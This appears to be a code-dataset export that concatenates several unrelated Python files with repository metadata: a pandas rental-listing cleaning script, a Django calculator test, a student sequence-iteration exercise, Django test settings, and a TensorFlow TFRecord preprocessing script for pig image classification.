df_listing['avail_days_weekdays'] = pd.Series(avail_days_weekdays_array)
df_listing['price_weekend'] = pd.Series(price_weekend_array)
df_listing['price_weekday'] = pd.Series(price_weekday_array)
return df_listing
def clean_listing_df(df_listing):
'''
This function aims to make the df_listing dataframe for data analysis by
- removing irrelevant columns
- changing object type columns to numeric columns or manipulating them using one hot encoding
- filling NaN values
- creating an integrated_score_log column by the natural log of the result from 'review_scores_rating' times 'number_of_reviews' +1
Input :
- A Pandas dataframe made from 'listings.csv' : df_listing
Output :
- Cleaned df_listing
'''
# Drop columns having 50% of nan value. There were reasons that I decided 50% the threshold for dropping columns.
# 1. Easy to see the dataframe and to check the meaning of the columns.
# 2. Decide which ones have to be dropped.
# The candidates columns to be dropped are 'notes', 'neighbourhood_group_cleansed', 'square_feet', 'weekly_price', 'monthly_price', 'security_deposit', 'has_availability', 'license', 'jurisdiction_names'. Most of them are duplicated to other columns or irrelavant except 'security_deposit' column. I didn't do imputing by the mean or mode of the column because it can distort real shape. I didn't do one-hot-encoding to make the dataframe straightforward. 'security_deposit' has 55 unique values.
df_missing = df_listing.isna().mean()
df_listing_modi1 = df_listing.drop(df_missing[df_missing>0.5].index.to_list(), axis=1)
# Drop columns related with urls and other irrelevant columns.
# url and othe columns are all unique or useless.
remove_list1 = ['listing_url', 'scrape_id', 'last_scraped', 'thumbnail_url', 'medium_url', 'picture_url', 'xl_picture_url', 'host_url',
'host_thumbnail_url', 'host_picture_url', 'country_code', 'country']
df_listing_modi1.drop(remove_list1, axis=1, inplace=True)
# Drop the columns because of data overlap [city, smart_location], Only one value [state],
# Drop the wrong data [market, calendar_last_scraped]
remove_list2 = ['smart_location', 'state', 'name', 'summary', 'space', 'description','neighborhood_overview',
'transit','access','market','calendar_last_scraped']
df_listing_modi1.drop(remove_list2, axis=1, inplace=True)
# Modify 'house_rules' column to 'house_rules_exist_tf' having True value if there is a rule.
# False value, if there is no rule.
# Houes_rules are different for every host. So it is not practical to use one-hot-encoding. Instead of that,
# It is changed to binary type, which is there is rule in a house, True, otherwise, False.
# This can save some information, which is better than just dropping.
df_listing_modi1['house_rules_exist_tf']= pd.notna(df_listing_modi1.house_rules)
df_listing_modi1.drop(['house_rules'], axis=1, inplace=True)
# Remove columns having 1000 unique string valuses and irrelevant data
remove_list3 = ['interaction', 'host_name', 'host_since', 'host_about', 'street','first_review','experiences_offered','requires_license',
'last_review','host_location','neighbourhood_cleansed','experiences_offered','requires_license']
df_listing_modi2 = df_listing_modi1.drop(remove_list3, axis=1)
# Change the columns 'host_response_rate', 'host_acceptance_rate' to float type
columns_change_type = ['host_response_rate','host_acceptance_rate', 'price', 'cleaning_fee']
for i in columns_change_type:
df_listing_modi2[i] = df_listing_modi2[i].str.replace('%','')
df_listing_modi2[i] = df_listing_modi2[i].str.replace('$','')
df_listing_modi2[i] = df_listing_modi2[i].str.replace(',','')
df_listing_modi2[i] = df_listing_modi2[i].astype(float)
# Modify and Split values in 'amenities' column
# Amenities can be one of reason that potential candidate might consider.
df_listing_modi2.amenities = df_listing_modi2.amenities.str.replace("[{}]", "")
df_amenities = df_listing_modi2.amenities.str.get_dummies(sep = ",")
df_amenities = df_amenities.add_prefix('amenities_')
df_listing_modi2 = pd.concat([df_listing_modi2, df_amenities], axis=1)
df_listing_modi2 = df_listing_modi2.drop('amenities', axis=1)
# Use get_dummies for columns having unique values less then 10
# It is reasonable to use one-hot-encoding if the nunber of unique values are less then 10.
# It doesn't lose information, and keep the dataframe simple.
columns_of_object_less10 =[]
for i,j in zip(df_listing_modi2.columns.to_list(), df_listing_modi2.dtypes.to_list()):
if j == object and len(df_listing_modi2[i].value_counts()) < 10 :
columns_of_object_less10.append(i)
df_listing_modi2 = pd.get_dummies(df_listing_modi2, columns=columns_of_object_less10, prefix=columns_of_object_less10,
dummy_na=True)
# Modify 'extra_people' coulmn to get boolean type of 'extra_people_fee_tf'
# Instead of dropping, I decided to change 'extra_people' coulmn to binary type to save some information
df_listing_modi2['extra_people'] = df_listing_modi2['extra_people'].astype(str)
df_listing_modi2['extra_people']= df_listing_modi2['extra_people'].str.replace('$','')
df_listing_modi2['extra_people']=df_listing_modi2['extra_people'].str.replace(',','')
df_listing_modi2['extra_people'] = df_listing_modi2['extra_people'].astype(float)
df_listing_modi2['extra_people'] = df_listing_modi2['extra_people'].replace(to_replace=0, value=np.nan)
df_listing_modi2['extra_people_fee_tf']= pd.notna(df_listing_modi2.extra_people)
df_listing_modi2 = df_listing_modi2.drop('extra_people', axis=1)
# Modify and Split values in 'host_verifications' column
df_listing_modi2.host_verifications = df_listing_modi2.host_verifications.str.replace("[", "")
df_listing_modi2.host_verifications = df_listing_modi2.host_verifications.str.replace("]", "")
df_host_verifications = df_listing_modi2.host_verifications.str.get_dummies(sep = ",")
df_host_verifications = df_host_verifications.add_prefix('host_verification_')
df_listing_modi2 = pd.concat([df_listing_modi2, df_host_verifications], axis=1)
df_listing_modi2 = df_listing_modi2.drop(['host_verifications'], axis=1)
df_listing_modi2 = df_listing_modi2.drop(['host_neighbourhood'], axis=1)
# Modify 'calendar_updated' column
# Instead of dropping, I decided to change 'calendar_updated' coulmn to binary type (updated within a week or not)
# to save some information
df_listing_modi2["calendar_updated_1weekago"] = np.where(df_listing_modi2['calendar_updated'].str.contains(
"days|yesterday|today|a week ago")==True, 'yes', 'more_than_1week')
df_listing_modi2 = df_listing_modi2.drop(['calendar_updated'], axis=1)
# Use get_dummies for the columns 'neighbourhood', 'city', 'zipcode', 'property_type'
tmp = df_listing_modi2.columns.to_list()
tmp1 = df_listing_modi2.dtypes.to_list()
columns_of_object_over10 =[]
for i,j in zip(tmp,tmp1):
if j == object and len(df_listing_modi2[i].value_counts()) > 10 :
columns_of_object_over10.append(i)
df_listing_modi2 = pd.get_dummies(df_listing_modi2, columns=columns_of_object_over10,
prefix=columns_of_object_over10, dummy_na=True)
df_listing_modi2 = pd.get_dummies(df_listing_modi2, columns=['calendar_updated_1weekago','house_rules_exist_tf','extra_people_fee_tf'],
prefix=['calendar_updated_1weekago','house_rules_exist_tf','extra_people_fee_tf'], dummy_na=True)
df_listing_modi2["host_response_rate_100"] = np.where(df_listing_modi2['host_response_rate'] ==100, True, False)
df_listing_modi2["host_acceptance_rate_100"] = np.where(df_listing_modi2['host_acceptance_rate'] ==100, True, False)
df_listing_modi2 = df_listing_modi2.drop(['host_response_rate','host_acceptance_rate','reviews_per_month'], axis=1)
# bathrooms, bedrooms, beds, cleaning_fee, review_scores_rating, review_... : : fillna with mean value
# The empty cell are filled with mean values of corresponding columns. Because these are numerical type,
# I thought imputing with mean values is better than dropping or one-hot-encoding
columns1 = ['bathrooms','bedrooms','beds','cleaning_fee','review_scores_rating','review_scores_accuracy','review_scores_cleanliness','review_scores_checkin',
'review_scores_communication','review_scores_location','review_scores_value']
df_listing_modi2[columns1] = df_listing_modi2[columns1].fillna(df_listing_modi2.mean())
df_listing_modi2.price_weekend.fillna(df_listing_modi2.price, inplace=True)
df_listing_modi2.price_weekday.fillna(df_listing_modi2.price, inplace=True)
df_listing_modi2['integrated_score_log'] = np.log(df_listing_modi2['review_scores_rating']*df_listing_modi2['number_of_reviews']+1)
df_listing_modi2 = pd.get_dummies(df_listing_modi2, columns=['host_response_rate_100','host_acceptance_rate_100'],
prefix=['host_response_rate_100','host_acceptance_rate_100'])
df_listing_modi2 = df_listing_modi2.drop(['id', 'host_id', 'latitude', 'longitude','price','host_listings_count','host_total_listings_count','maximum_nights'], axis=1)
return df_listing_modi2
def conditioning_listing_df(df_listing_modi2):
'''
This function is for conditioning a dataframe returned by the funtion 'clean_listing_df(df_listing)''
Input :
- A Pandas dataframe came from the function 'clean_listing_df(df_listing)''
Output :
- Cleaned df_listing_modi2 : df_listing_modi3
'''
threshold_80 = df_listing_modi2.integrated_score_log.quantile(0.8)
condition = [df_listing_modi2['integrated_score_log'] == 0, df_listing_modi2['integrated_score_log'] >= threshold_80]
label_list = ['poor','high']
df_listing_modi2['y_label'] = np.select(condition, label_list, default='normal')
# Drop columns related to 'y_label' column
# Without dropping, the remained columns affect model's prediction
df_listing_modi3 = df_listing_modi2.drop(['integrated_score_log','number_of_reviews','review_scores_rating', 'review_scores_value',
'review_scores_communication','review_scores_accuracy','review_scores_checkin','review_scores_cleanliness',
'review_scores_location', 'availability_30','availability_60', 'availability_90','availability_365','calculated_host_listings_count'], axis=1)
return df_listing_modi3
def investigate(df_listing_scaled, pca, i):
'''
This function checks pca components that which original features are storngly related to a pca component
Input :
- Dataframe : df_listing_scaled a dataframe scaled by StandardScaler()
- pca instance
- i : The number of pca component
Output :
- pos_list : Original features having positive relationship with a
corresponding pca component,which are sorted in order of importance
- neg_list : Original features having positive relationship with a
corresponding pca component,which are sorted in order of importance
'''
pos_list =[]
neg_list =[]
feature_names = list(df_listing_scaled.columns)
weights_pca = copy.deepcopy(pca.components_[i])
combined = list(zip(feature_names, weights_pca))
combined_sorted= sorted(combined, key=lambda tup: tup[1], reverse=True)
tmp_list = [list(x) for x in combined_sorted]
tmp_list = [(x[0],"{0:.3f}".format(x[1])) for x in tmp_list]
print("positive to pca{}:".format(i), tmp_list[0:10])
print()
print("negative to pca{}:".format(i), tmp_list[-1:-11:-1])
print()
for j in range(0,10):
pos_list.append(tmp_list[j][0])
for k in range(1,11):
neg_list.append(tmp_list[-k][0])
return pos_list, neg_list
def check_difference(pos_list, neg_list, df_listing_poor, df_listing_high):
'''
Print original features that are stongly related with a corresponding pca component.
'''
data_pos = [[df_listing_high[x].mean(), df_listing_poor[x].mean()] for x in pos_list]
data_neg = [[df_listing_high[x].mean(), df_listing_poor[x].mean()] for x in neg_list]
tmp_pos = pd.DataFrame(data=data_pos , index=pos_list, columns=['high', 'poor'])
tmp_neg = pd.DataFrame(data=data_neg , index=neg_list, columns=['high', 'poor'])
tmp_both = pd.concat([tmp_pos, tmp_neg])
tmp_both["difference"] = tmp_both.high - tmp_both.poor
tmp_both["difference"] = tmp_both["difference"].abs()
result = tmp_both.sort_values(by=['difference'], ascending=False)
return result
| 54.807453
| 501
| 0.716228
|
794b0f111f9a82f3baf57c7340021a301e1077e4
| 1,535
|
py
|
Python
|
servicex_storage/__init__.py
|
ssl-hep/servicex_storage_lib
|
43078bc9ce0dbad29cf152b0f2328f290a3d449f
|
[
"BSD-3-Clause"
] | null | null | null |
servicex_storage/__init__.py
|
ssl-hep/servicex_storage_lib
|
43078bc9ce0dbad29cf152b0f2328f290a3d449f
|
[
"BSD-3-Clause"
] | 15
|
2021-05-21T00:26:59.000Z
|
2022-03-19T16:10:27.000Z
|
tests/servicex_did_finder_lib/__init__.py
|
ssl-hep/ServiceX_DID_Finder_lib
|
15328b22a48f8bf30907c0240ce93f692ca85077
|
[
"Apache-2.0"
] | null | null | null |
# Copyright (c) 2021, IRIS-HEP
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
| 54.821429
| 80
| 0.785016
|
794b0f18e47168339b9d5b0032432d2436445874
| 382
|
py
|
Python
|
app/app/tests.py
|
OsamaDaghestani/recipe-app-api
|
f8963b1b899503d2802ddc6a5c91ada704b1352a
|
[
"MIT"
] | null | null | null |
app/app/tests.py
|
OsamaDaghestani/recipe-app-api
|
f8963b1b899503d2802ddc6a5c91ada704b1352a
|
[
"MIT"
] | null | null | null |
app/app/tests.py
|
OsamaDaghestani/recipe-app-api
|
f8963b1b899503d2802ddc6a5c91ada704b1352a
|
[
"MIT"
] | null | null | null |
from django.test import TestCase
from app.calc import add, subtract
class CalcTests(TestCase):
"""docstring for ."""
def test_add_numbers(self):
"""Test that two numbers are added together"""
self.assertEqual(add(3, 8), 11)
def test_subtract_numbers(self):
"""Test that numbers are subtracted"""
self.assertEqual(subtract(5, 11), 6)
| 23.875
| 54
| 0.659686
|
794b101e57ce4b3a37df2b17a4b1f5e5ad406109
| 11,801
|
py
|
Python
|
src/m5_more_sequences.py
|
mahne/12-MoreSequences
|
9a3a01897e12bae58fd86c421b387fc0204ac62e
|
[
"MIT"
] | null | null | null |
src/m5_more_sequences.py
|
mahne/12-MoreSequences
|
9a3a01897e12bae58fd86c421b387fc0204ac62e
|
[
"MIT"
] | null | null | null |
src/m5_more_sequences.py
|
mahne/12-MoreSequences
|
9a3a01897e12bae58fd86c421b387fc0204ac62e
|
[
"MIT"
] | null | null | null |
"""
This module lets you practice various patterns
for ITERATING through SEQUENCES, including:
-- Beginning to end
-- Other ranges (e.g., backwards and every-3rd-item)
-- The COUNT/SUM/etc pattern
-- The FIND pattern (via LINEAR SEARCH)
Authors: David Mutchler, Vibha Alangar, Matt Boutell, Dave Fisher,
Mark Hays, Amanda Stouder, Aaron Wilkin, their colleagues,
and Ethan Mahn.
""" # DONE: 1. PUT YOUR NAME IN THE ABOVE LINE.
import rosegraphics as rg
def main():
""" Calls the TEST functions in this module. """
run_test_sum_radii()
run_test_count_last_n_odds()
run_test_index_of_first_negative()
run_test_contains_an_a()
###############################################################################
# Many problems simply iterate (loop) through ALL of the sequence,
# as in the sum_radii problem below.
###############################################################################
def run_test_sum_radii():
""" Tests the sum_radii function. """
print()
print('--------------------------------------------------')
print('Testing the sum_radii function:')
print('--------------------------------------------------')
# Test 1 is ALREADY DONE (here).
print()
circle1 = rg.Circle(rg.Point(100, 100), 25)
circle2 = rg.Circle(rg.Point(100, 100), 50)
circle3 = rg.Circle(rg.Point(100, 100), 10)
expected = 85
seq = (circle1, circle2, circle3)
actual = sum_radii(seq)
print('Expected:', expected)
print('Actual: ', actual)
# Test 2 is ALREADY DONE (here).
print()
circle1 = rg.Circle(rg.Point(200, 20), 80)
circle2 = rg.Circle(rg.Point(300, 100), 60)
circle3 = rg.Circle(rg.Point(100, 150), 0)
circle4 = rg.Circle(rg.Point(0, 0), 30)
expected = 170
seq = (circle1, circle2, circle3, circle4)
actual = sum_radii(seq)
print('Expected:', expected)
print('Actual: ', actual)
def sum_radii(circles):
"""
What comes in:
-- a sequence of rg.Circle objects
What goes out:
Returns the sum of the radii of the given sequence of rg.Circles.
Side effects: None.
Example: If
circle1 = rg.Circle(rg.Point(999, 100), 25)
circle2 = rg.Circle(rg.Point(888, 200), 50)
circle3 = rg.Circle(rg.Point(777, 300), 10)
then sum_radii([circle1, circle2, circle3])
returns 25 + 50 + 10, which is 85.
Type hints:
:type circles: list | tuple of rg.Circle
:rtype: int | float
"""
# -------------------------------------------------------------------------
# DONE: 2. Implement and test this function.
# The testing code is already written for you (above).
#
# Note: No fair using "slices" on ANY of these problems,
# if you happen to know what they are.
#
# Likewise, no fair using any builtin methods on sequences
# or strings, if you happen to know any.
#
# Instead, use explicit loops, as you have for other problems.
# -------------------------------------------------------------------------
sum = 0
for k in range(len(circles)):
sum += circles[k].radius
return sum
###############################################################################
# Some problems iterate (loop) through PART of the sequence,
# perhaps BACKWARDS, as in the count_last_n_odds problem below.
###############################################################################
def run_test_count_last_n_odds():
""" Tests the count_last_n_odds function. """
print()
print('--------------------------------------------------')
print('Testing the count_last_n_odds function:')
print('--------------------------------------------------')
# Six tests - ALREADY DONE (here).
seq = [1, 5, 88, 44, 33, 77, 10, 12, 9]
answer1 = count_last_n_odds(seq, 0)
answer2 = count_last_n_odds(seq, 1)
answer3 = count_last_n_odds(seq, 6)
answer4 = count_last_n_odds(seq, 7)
answer5 = count_last_n_odds(seq, 8)
answer6 = count_last_n_odds(seq, 9)
print()
print('Test set #1 of count_last_n_odds:',
answer1, answer2, answer3, answer4, answer5, answer6)
print('The above should be: 0 1 3 3 4 5')
# Six more tests - ALREADY DONE (here).
seq = [17, 88, -5, -10, 0]
answer1 = count_last_n_odds(seq, 0)
answer2 = count_last_n_odds(seq, 1)
answer3 = count_last_n_odds(seq, 2)
answer4 = count_last_n_odds(seq, 3)
answer5 = count_last_n_odds(seq, 4)
answer6 = count_last_n_odds(seq, 5)
print()
print('Test set #2 of count_last_n_odds:',
answer1, answer2, answer3, answer4, answer5, answer6)
print('The above should be: 0 0 0 1 1 2')
def count_last_n_odds(integers, n):
"""
What comes in:
-- a sequence of integers
-- a non-negative integer n that is less than or equal to
the length of the given sequence
What goes out: Returns the number of odd integers
in the last n items of the given sequence.
Side effects: None.
Examples:
If the sequence is (13, 66, 15, 3), then:
count_last_n_odds(sequence, 0) is 0 [no odds]
count_last_n_odds(sequence, 1) is 1 [1 odd, namely 3]
count_last_n_odds(sequence, 2) is 2 [2 odds, namely 3 and 15]
count_last_n_odds(sequence, 3) is 2 [2 odds, namely 3 and 15]
count_last_n_odds(sequence, 4) is 3 [3 odds: 3, 15 and 13]
Type hints:
:type integers: list | tuple of int
:type n: int
:rtype: int
"""
# -------------------------------------------------------------------------
# DONE: 3. Implement and test this function.
# The testing code is already written for you (above).
# -------------------------------------------------------------------------
total = 0
for k in range(-1,-n-1,-1):
if integers[k]%2==1:
total+=1
return total
###############################################################################
# Some problems iterate (loop) through PART of the sequence,
# stopping when the loop FINDS something of interest
# (or continuing to the end if it does NOT find the thing of interest),
# as in the following problems:
###############################################################################
def run_test_index_of_first_negative():
""" Tests the index_of_first_negative function. """
print()
print('--------------------------------------------------')
print('Testing the index_of_first_negative function:')
print('--------------------------------------------------')
# Test 1:
print()
expected = 3
actual = index_of_first_negative([90, 0, 20, -5, 30, -10, 15])
print('Expected:', expected)
print('Actual: ', actual)
# Test 2:
print()
expected = 0
actual = index_of_first_negative([-5, 30, -10, 15])
print('Expected:', expected)
print('Actual: ', actual)
# Test 3:
print()
expected = 4
actual = index_of_first_negative([5, 30, 10, 15, -1])
print('Expected:', expected)
print('Actual: ', actual)
# Test 4:
print()
expected = -1
actual = index_of_first_negative([5, 30, 10, 15, 1, 6])
print('Expected:', expected)
print('Actual: ', actual)
if actual == '-1':
print(' Your answer is WRONG.')
print(' You returned the STRING \'-1\'')
print(' when you should have returned just -1')
def index_of_first_negative(numbers):
"""
What comes in:
-- a sequence of numbers
What goes out: Returns the INDEX of the first negative number
in the given sequence of numbers, or -1 if the sequence
contains no negative numbers.
Note: "first" negative number means the negative number
whose index is smallest -- see the examples.
Side effects: None.
Examples: If the argument is:
-- [4, 30, -19, 8, -3, -50, 100], this function returns 2
since the first negative number is -19, which is at index 2
-- [-8, 44, 33], this function returns 0
since the first negative number is -8, which is at index 0
-- [1, 29, 22, 8], this function returns -1
since the list contains no negative numbers
Type hints:
:type numbers: list | tuple of float | int
:rtype: int
"""
# -------------------------------------------------------------------------
# DONE: 4. Implement and test this function.
# The testing code is already written for you (above).
# -------------------------------------------------------------------------
for k in range(len(numbers)):
if numbers[k]<0:
return k
return -1
def run_test_contains_an_a():
""" Tests the contains_an_a function. """
print()
print('--------------------------------------------------')
print('Testing the contains_an_a function:')
print('--------------------------------------------------')
# Tests:
actual1 = contains_an_a('nope')
actual2 = contains_an_a('yes a is here')
actual3 = contains_an_a('many aaaaas aaa aaa')
actual4 = contains_an_a('not until the very end is a')
actual5 = contains_an_a('a @ the beginning')
actual6 = contains_an_a('')
actual7 = contains_an_a('BLAH BLAH BLAH')
actual8 = contains_an_a('BLAH BLAH BLAH \t MORE BLAH')
actual9 = contains_an_a('BLAH BLAH BLAH \t MORE BLaH')
actuals = (actual1, actual2, actual3, actual4, actual5, actual6,
actual7, actual8, actual9)
expecteds = (False, True, True, True, True, False,
False, False, True)
for k in range(len(actuals)):
print()
print('Expected:', expecteds[k])
print('Actual: ', actuals[k])
if type(actuals[k]) is str and str(expecteds[k]) == actuals[k]:
print('Your code FAILED this test for contains_an_a.')
print(' You appear to have returned the STRING:')
print(' "' + actuals[k] + '"')
print(' instead of the built-in constant:')
print(' ' + str(expecteds[k]))
def contains_an_a(s):
"""
What comes in:
-- a string
What goes out: Returns True if the given string contains
the character 'a'. Returns False if the given string
does not contain the character 'a'.
Side effects: None.
Examples:
-- contains_an_a('blah blah blah') returns True
-- contains_an_a('BLAH BLAH BLAH') returns False
-- contains_an_a('abc') returns True
-- contains_an_a('') returns False
Type hints:
:type s: str
:rtype: bool
"""
# -------------------------------------------------------------------------
# TODO: 5. Implement and test this function.
# The testing code is already written for you (above).
#
###########################################################################
# IMPORTANT:
# -- True and False are built-in constants.
# Do NOT return the STRINGs 'True' and 'False'.
###########################################################################
#
# Implementation requirement:
# Use an explicit loop, as you have done in the other problems.
# No fair using the count or find string methods.
# -------------------------------------------------------------------------
for k in range(len(s)):
if s[k] == 'a':
return True
return False
# -----------------------------------------------------------------------------
# Calls main to start the ball rolling.
# -----------------------------------------------------------------------------
main()
| 36.42284
| 79
| 0.518854
|
794b1090a86d5488b72caa60d61a191d9d338a87
| 5,516
|
py
|
Python
|
tests/settings14.py
|
0x07Ltd/django-condition-chain
|
b00d2efbdba6df1c0b3e167b961a9205664633b1
|
[
"Unlicense"
] | null | null | null |
tests/settings14.py
|
0x07Ltd/django-condition-chain
|
b00d2efbdba6df1c0b3e167b961a9205664633b1
|
[
"Unlicense"
] | null | null | null |
tests/settings14.py
|
0x07Ltd/django-condition-chain
|
b00d2efbdba6df1c0b3e167b961a9205664633b1
|
[
"Unlicense"
] | null | null | null |
# Django settings for Django Condition Chain project.
import os
from tempfile import gettempdir
DEBUG = True
TEMPLATE_DEBUG = DEBUG
ADMINS = (
# ('Your Name', 'your_email@example.com'),
)
MANAGERS = ADMINS
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(gettempdir(), 'django-condition-chain.tests.db'),
'USER': '', # Not used with sqlite3.
'PASSWORD': '', # Not used with sqlite3.
'HOST': '', # Set to empty string for localhost. Not used with sqlite3.
'PORT': '', # Set to empty string for default. Not used with sqlite3.
}
}
# Hosts/domain names that are valid for this site; required if DEBUG is False
# See https://docs.djangoproject.com/en/1.4/ref/settings/#allowed-hosts
ALLOWED_HOSTS = []
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# In a Windows environment this must be set to your system time zone.
TIME_ZONE = 'Europe/London'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-gb'
SITE_ID = 1
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale.
USE_L10N = True
# If you set this to False, Django will not use timezone-aware datetimes.
USE_TZ = True
# Absolute filesystem path to the directory that will hold user-uploaded files.
# Example: "/home/media/media.lawrence.com/media/"
MEDIA_ROOT = ''
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash.
# Examples: "http://media.lawrence.com/media/", "http://example.com/media/"
MEDIA_URL = ''
# Absolute path to the directory static files should be collected to.
# Don't put anything in this directory yourself; store your static files
# in apps' "static/" subdirectories and in STATICFILES_DIRS.
# Example: "/home/media/media.lawrence.com/static/"
STATIC_ROOT = ''
# URL prefix for static files.
# Example: "http://media.lawrence.com/static/"
STATIC_URL = '/static/'
# Additional locations of static files
STATICFILES_DIRS = (
# Put strings here, like "/home/html/static" or "C:/www/django/static".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
)
# List of finder classes that know how to find static files in
# various locations.
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
# 'django.contrib.staticfiles.finders.DefaultStorageFinder',
)
# Make this unique, and don't share it with anybody.
SECRET_KEY = '0yt52*upn&&_(jkkkd&-=r-x1b$2w(b2umv2_(+ak)gqzx#e($'
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
# 'django.template.loaders.eggs.Loader',
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
# Uncomment the next line for simple clickjacking protection:
# 'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'django_condition_chain.urls'
# Python dotted path to the WSGI application used by Django's runserver.
WSGI_APPLICATION = 'django_condition_chain.wsgi.application'
TEMPLATE_DIRS = (
# Put strings here, like "/home/html/django_templates" or "C:/www/django/templates".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
)
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
# Uncomment the next line to enable the admin:
# 'django.contrib.admin',
# Uncomment the next line to enable admin documentation:
# 'django.contrib.admindocs',
'django_condition_chain',
'django_nose'
)
# A sample logging configuration. The only tangible logging
# performed by this configuration is to send an email to
# the site admins on every HTTP 500 error when DEBUG=False.
# See http://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse'
}
},
'handlers': {
'mail_admins': {
'level': 'ERROR',
'filters': ['require_debug_false'],
'class': 'django.utils.log.AdminEmailHandler'
}
},
'loggers': {
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
}
}
TEST_RUNNER = 'django_nose.NoseTestSuiteRunner'
| 33.840491
| 100
| 0.69797
|
794b11792dadf4144bdf1dce08fdd6c718226e24
| 3,255
|
py
|
Python
|
data_preprocess.py
|
LinMaris/JDD_PigImageClassification
|
2b84ba524265191ea7fc1ea5dc5ba32588e6b135
|
[
"MIT"
] | null | null | null |
data_preprocess.py
|
LinMaris/JDD_PigImageClassification
|
2b84ba524265191ea7fc1ea5dc5ba32588e6b135
|
[
"MIT"
] | null | null | null |
data_preprocess.py
|
LinMaris/JDD_PigImageClassification
|
2b84ba524265191ea7fc1ea5dc5ba32588e6b135
|
[
"MIT"
] | null | null | null |
import cv2
import numpy as np
import os
import tensorflow as tf
rootDir = './save/1/'
def makeData():
train_writer = tf.python_io.TFRecordWriter('train.tfrecords')
valid_writer = tf.python_io.TFRecordWriter('valid.tfrecords')
# test_writer = tf.python_io.TFRecordWriter('test.tfrecords')
img_size = (256,256) #待定
for parent, dirnames,filenames in os.walk(rootDir):
for filename in filenames:
if filename.endswith('.jpeg'):
label = np.zeros(shape=[30],dtype=np.uint8)
each_video_path = os.path.join(parent,filename)
img = cv2.imread(each_video_path)
img = cv2.cvtColor(img,cv2.COLOR_BGR2RGB)
img = cv2.resize(img, img_size)
result = filename.split('_')[0]
label[int(result) - 1] = 1 # one-hot
# print(label)
img_raw = img.tostring() # 将图像数据转化为包含像素数据的字符串
example = tf.train.Example(
features=tf.train.Features(
feature={
"label": tf.train.Feature(bytes_list=tf.train.BytesList(value=[label.tostring()])),
'data_raw': tf.train.Feature(bytes_list=tf.train.BytesList(value=[img_raw]))
}
)
)
rn = int(filename.split('_')[1][:-5])
if rn % 5 == 0:
valid_writer.write(example.SerializeToString())
else:
train_writer.write(example.SerializeToString())
train_writer.close()
valid_writer.close()
def readRecords(filename):
# 生成文件名队列,此处默认为当前创建的文件
filename_queue = tf.train.string_input_producer([filename])
reader = tf.TFRecordReader()
_, serialized_example = reader.read(filename_queue)
features = tf.parse_single_example(serialized_example,
features={
'data_raw': tf.FixedLenFeature([], tf.string),
'label': tf.FixedLenFeature([], tf.string),
}
)
img = tf.decode_raw(features['data_raw'], tf.uint8)
img = tf.reshape(img, [256, 256, 3])
img = tf.cast(img, tf.float32) * (1. / 255) - 0.5
label = tf.decode_raw(features['label'], tf.uint8)
label = tf.reshape(label, [30])
return img, label
def test_records():
img, label = readRecords("train.tfrecords")
img_batch, label_batch = tf.train.shuffle_batch([img, label],
batch_size=30, capacity=2000,
min_after_dequeue=1000)
with tf.Session() as sess:
sess.run(tf.initialize_all_variables())
threads = tf.train.start_queue_runners(sess=sess)
# 输出10个样本
for i in range(10):
val, l = sess.run([img_batch, label_batch])
# l = to_categorical(l, 12)
print(val.shape, l)
if __name__ == '__main__':
# makeData()
test_records()
| 36.988636
| 112
| 0.515822
|
794b13b0d5296972d6986702e6a6ce6e32898f91
| 22,773
|
py
|
Python
|
gazoo_device/tests/unit_tests/fire_manager_test.py
|
google/gazoo-device
|
